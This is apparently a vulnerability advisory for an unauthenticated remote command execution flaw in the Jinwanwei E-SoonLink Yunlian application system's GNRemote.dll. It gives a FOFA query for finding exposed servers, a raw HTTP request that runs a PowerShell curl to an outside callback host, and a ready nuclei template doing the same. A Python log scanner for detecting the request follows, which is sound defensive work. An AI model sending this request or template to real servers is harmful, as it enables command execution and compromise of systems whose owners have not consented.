
Jinwanwei E-SoonLink Yunlian Application System GNRemote Remote Command Execution Vulnerability

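1. Vulnerability Overview

Jinwanwei E-SoonLink is a leading Chinese software platform for remote access, mobile office, and application virtualization. The remote command execution vulnerability in the Jinwanwei E-SoonLink Yunlian application system is extremely easy to exploit: a malicious request can be sent directly without logging in. It may be exploited in bulk by worms and hacker groups, leading to large-scale leakage of sensitive information and server compromise.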

2. Affected Versions

  • Yunlian application system (云联应用系统)

3. Asset Mapping

  • fofa: title="云联应用系统接入平台"
  • Characteristics


4. Vulnerability Reproduction

GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+akuyfhpxbo.dgrh3.cn HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0


nuclei

id: jinwanwei_GNRemote_rce

info:
  name: jinwanwei_GNRemote_rce
  author: xiaokp7
  severity: critical
  description: 金万维异速联云联应用系统GNRemote.dll 存在远程命令执行漏洞


http:
- raw:
  - |+
    @timeout: 30s
    GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=powershell+curl+{{interactsh-url}} HTTP/1.1
    Host: {{Hostname}}
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip, deflate
    Priority: u=0, i
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0


  matchers:
    - type: word
      part: interactsh_protocol # Confirms the DNS Interaction
      words:
        - "dns"

# Generated From WebFuzzer on 2024-04-18 09:43:10
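
For defenders, the request shown in section 4 can be hunted for in web server access logs. The Python below is an added example, not part of the original write-up or the vendor's code; the two log formats, the sample lines, and case-insensitive matching of parameter names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# GNRemote.dll followed by its query string. "?" covers combined-format logs;
# whitespace covers IIS W3C logs, which split cs-uri-stem and cs-uri-query.
TARGET = re.compile(r"/gnremote\.dll(?:\?|\s+)(\S+)", re.IGNORECASE)

def inspect_line(line):
    """Return the decoded CallPython parameters if the line carries the request
    shape shown in the reproduction section, otherwise None."""
    m = TARGET.search(line)
    if not m:
        return None
    # parse_qsl undoes percent-encoding and "+"; keys are lower-cased on the
    # assumption that the handler matches parameter names case-insensitively.
    params = {k.lower(): v for k, v in parse_qsl(m.group(1), keep_blank_values=True)}
    if params.get("gnfunction", "").lower() != "callpython":
        return None
    return {name: params.get(name.lower(), "") for name in ("pyFile", "pyFunc", "pyArgu")}

def scan(lines):
    """Return (line_number, parameters) for every matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = inspect_line(line)
        if found is not None:
            hits.append((number, found))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host name).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jul/2024:12:33:01 +0800] "GET /GNRemote.dll?GNFunction=CallPython'
    '&pyFile=os&pyFunc=system&pyArgu=powershell+curl+oob.example.invalid HTTP/1.1" 200 0',
    '2024-07-23 04:35:10 10.0.0.5 GET /gnremote.dll gnfunction=%43allPython&PYFILE=os'
    '&pyfunc=system&pyargu=placeholder 80 - 203.0.113.9 - 200 0 0 15',
    '198.51.100.4 - - [23/Jul/2024:12:40:00 +0800] "GET /GNRemote.dll?GNFunction=Other HTTP/1.1" 200 0',
    '198.51.100.4 - - [23/Jul/2024:12:41:00 +0800] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: CallPython request {found}")
```

Any hit from an unauthenticated source is worth triage, since the advisory states the request works without logging in.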

Original: https://www.yuque.com/xiaokp7/ocvun2/pvkd35vlw3nk8f3m